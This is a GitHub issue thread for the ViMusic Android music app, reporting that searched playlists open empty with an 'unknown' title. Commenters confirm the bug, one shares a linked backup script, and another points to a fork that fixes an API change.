### ISSUE TITLE
Playlist not opening

### ISSUE THREAD

**Issue by Kushagraweb** [vfsfitvnm/ViMusic#1788]
### Steps to reproduce the bug

1 Go to vmusic.apk app
2 search any playlist 
3 open the playlist
4 playlist opening with title unknown with no song

### Expected behavior

The playlist should open with all the song of the artist 

### Actual behavior

The playlist doesn't have any song in it

### Screenshots/Screen recordings

![Screenshot_20240721-204111](https://github.com/user-attachments/assets/f672c1cd-dcf7-4874-a5d4-ba2e7ddb4c1b)

### Logs

No

### ViMusic version

Latest

### Android version

Android  12 

### Additional information

My internet speed is very good so it's not an wifi problem neither should be the device as it's a new device

**Comment by itzshoaibmalik** [comment]
Same issue, please solve it

**Comment by UnsportedVortex22565** [comment]
Same here, android 14

**Comment by ewfawfasdf** [comment]
I wrote a python code that allows you to make a backup with a ready-made playlist
[download code](https://github.com/user-attachments/files/16329526/be.zip)
[tutorial](https://youtu.be/x1x4B19pLss)

**Comment by JohnRFirst** [comment]
Try a fork that fixes the API change problem. I linked it here https://github.com/vfsfitvnm/ViMusic/issues/1835#issuecomment-2265174909

**Comment by Kushagraweb** [comment]
Thanks! Great help

**Comment by JohnRFirst** [comment]
> Thanks! Great help
> 
> 

Great! We can close the issue now :)

**Comment by IronManav** [comment]
It's still there
